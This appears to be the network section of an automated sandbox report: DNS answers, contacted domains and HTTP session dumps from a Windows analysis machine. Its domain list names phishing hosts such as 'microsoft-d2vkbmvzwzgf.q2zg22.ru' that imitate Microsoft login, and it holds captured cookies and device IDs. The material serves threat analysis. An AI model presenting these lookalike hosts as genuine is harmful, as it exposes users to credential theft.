                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.138A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.844902992 CET1.1.1.1192.168.2.160xc051No error (0)clients.l.google.com142.250.105.139A (IP address)IN (0x0001)false
                                                                                                                          Feb 2, 2024 20:19:09.845123053 CET1.1.1.1192.168.2.160x6791No error (0)clients1.google.comclients.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                          • fs.microsoft.com
                                                                                                                          • login.live.com
                                                                                                                          • https:
                                                                                                                            • www.bing.com
                                                                                                                            • microsoft-d2vkbmvzwzgf.q2zg22.ru
                                                                                                                            • office.q2zg22.ru
                                                                                                                            • react.q2zg22.ru
                                                                                                                            • aadcdn.msftauth.net
                                                                                                                            • ywnjb.q2zg22.ru
                                                                                                                            • logincdn.msftauth.net
                                                                                                                          • slscr.update.microsoft.com
                                                                                                                          • accounts.google.com
                                                                                                                          • clients2.google.com
                                                                                                                          • sushishop.commander1.com
                                                                                                                          • galeonconstruction.com
                                                                                                                          • clients1.google.com
                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          0192.168.2.1649715184.31.50.93443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:18 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          Accept-Encoding: identity
                                                                                                                          If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          Range: bytes=0-2147483646
                                                                                                                          User-Agent: Microsoft BITS/7.8
                                                                                                                          Host: fs.microsoft.com
                                                                                                                          2024-02-02 19:17:18 UTC531INHTTP/1.1 200 OK
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                          ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                          ApiVersion: Distribute 1.1
                                                                                                                          Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                          X-Azure-Ref: 0URSoYgAAAABePpjyRlUAQrduejDbkqt8U0pDRURHRTA1MjAAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                          Cache-Control: public, max-age=106145
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:18 GMT
                                                                                                                          Content-Length: 55
                                                                                                                          Connection: close
                                                                                                                          X-CID: 2
                                                                                                                          2024-02-02 19:17:18 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                          Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.164971840.126.29.12443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:30 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/soap+xml
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                          Content-Length: 3592
                                                                                                                          Host: login.live.com
                                                                                                                          2024-02-02 19:17:30 UTC3592OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                          2024-02-02 19:17:31 UTC569INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                          Expires: Fri, 02 Feb 2024 19:16:31 GMT
                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          x-ms-route-info: C107_SN1
                                                                                                                          x-ms-request-id: f3759c40-879b-409c-8029-f6899d269474
                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0001101D V: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:30 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 11367
                                                                                                                          2024-02-02 19:17:31 UTC11367INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.164971940.126.29.12443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:31 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/soap+xml
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                          Content-Length: 4751
                                                                                                                          Host: login.live.com
                                                                                                                          2024-02-02 19:17:31 UTC4751OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                          2024-02-02 19:17:32 UTC569INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                          Expires: Fri, 02 Feb 2024 19:16:32 GMT
                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          x-ms-route-info: C107_SN1
                                                                                                                          x-ms-request-id: 66b6f49c-375a-4b47-a2ee-339e186e1102
                                                                                                                          PPServer: PPV: 30 H: SN1PEPF0002CF4D V: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:31 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 11367
                                                                                                                          2024-02-02 19:17:32 UTC11367INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.164972040.126.29.12443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:32 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Content-Type: application/soap+xml
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                          Content-Length: 4718
                                                                                                                          Host: login.live.com
                                                                                                                          2024-02-02 19:17:32 UTC4718OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                          2024-02-02 19:17:32 UTC569INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                          Expires: Fri, 02 Feb 2024 19:16:32 GMT
                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                          x-ms-route-info: C107_SN1
                                                                                                                          x-ms-request-id: e4b09f33-4d76-4ba9-b227-5c426485e9dc
                                                                                                                          PPServer: PPV: 30 H: SN1PEPF00011043 V: 0
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:32 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 10197
                                                                                                                          2024-02-02 19:17:32 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                          4192.168.2.164972423.1.237.25443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:39 UTC2273OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                          Origin: https://www.bing.com
                                                                                                                          Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                          Accept: */*
                                                                                                                          Accept-Language: en-CH
                                                                                                                          Content-type: text/xml
                                                                                                                          X-Agent-DeviceId: 01000A4109009A83
                                                                                                                          X-BM-CBT: 1696585056
                                                                                                                          X-BM-DateFormat: dd/MM/yyyy
                                                                                                                          X-BM-DeviceDimensions: 784x984
                                                                                                                          X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                          X-BM-DeviceScale: 100
                                                                                                                          X-BM-DTZ: 120
                                                                                                                          X-BM-Market: CH
                                                                                                                          X-BM-Theme: 000000;0078d7
                                                                                                                          X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765
                                                                                                                          X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647
                                                                                                                          X-Device-isOptin: false
                                                                                                                          X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                          X-Device-OSSKU: 48
                                                                                                                          X-Device-Touch: false
                                                                                                                          X-DeviceID: 01000A4109009A83
                                                                                                                          X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c
                                                                                                                          X-MSEdge-ExternalExpType: JointCoord
                                                                                                                          X-PositionerType: Desktop
                                                                                                                          X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                          X-Search-CortanaAvailableCapabilities: None
                                                                                                                          X-Search-SafeSearch: Moderate
                                                                                                                          X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                          X-UserAgeClass: Unknown
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                          Host: www.bing.com
                                                                                                                          Content-Length: 608
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Cookie: SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1696584863&IPMH=5e4190f4&IPMID=1696585056345&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                                          2024-02-02 19:17:39 UTC1OUTData Raw: 3c
                                                                                                                          Data Ascii: <
                                                                                                                          2024-02-02 19:17:39 UTC607OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 36 34 38 31 41 46 33 32 31 31 46 30 34 33 44 41 39 30 30 39 46 46 31 30 39 32 45 43 36 45 36 46 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                          Data Ascii: ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>6481AF3211F043DA9009FF1092EC6E6F</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                          2024-02-02 19:17:39 UTC476INHTTP/1.1 204 No Content
                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                          X-MSEdge-Ref: Ref A: 38026E8E811D4309B2CA34C5561D66E1 Ref B: CO1EDGE1319 Ref C: 2024-02-02T19:17:39Z
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:39 GMT
                                                                                                                          Connection: close
                                                                                                                          Alt-Svc: h3=":443"; ma=93600
                                                                                                                          X-CDN-TraceID: 0.15ed0117.1706901459.219882c3


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          5192.168.2.164972320.12.23.50443
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:39 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XN7tdkbw6C3m8Lv&MD=htgtz4Vy HTTP/1.1
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Accept: */*
                                                                                                                          User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                          Host: slscr.update.microsoft.com
                                                                                                                          2024-02-02 19:17:39 UTC560INHTTP/1.1 200 OK
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          Content-Type: application/octet-stream
                                                                                                                          Expires: -1
                                                                                                                          Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                          ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                          MS-CorrelationId: a1cbe3f4-2e66-4778-a983-f260df605daf
                                                                                                                          MS-RequestId: 4ccc40ec-e7d1-48c2-b15f-3b68a78dad6a
                                                                                                                          MS-CV: 6tC4LKlslEW6Fouw.0
                                                                                                                          X-Microsoft-SLSClientCache: 2880
                                                                                                                          Content-Disposition: attachment; filename=environment.cab
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Date: Fri, 02 Feb 2024 19:17:39 GMT
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 24490
                                                                                                                          2024-02-02 19:17:39 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                          Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                          2024-02-02 19:17:39 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                          Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          6192.168.2.164972664.233.185.844435716C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2024-02-02 19:17:40 UTC680OUTPOST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1
                                                                                                                          Host: accounts.google.com
                                                                                                                          Connection: keep-alive
                                                                                                                          Content-Length: 1
                                                                                                                          Origin: https://www.google.com
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                          Accept-Language: en-US,en;q=0.9
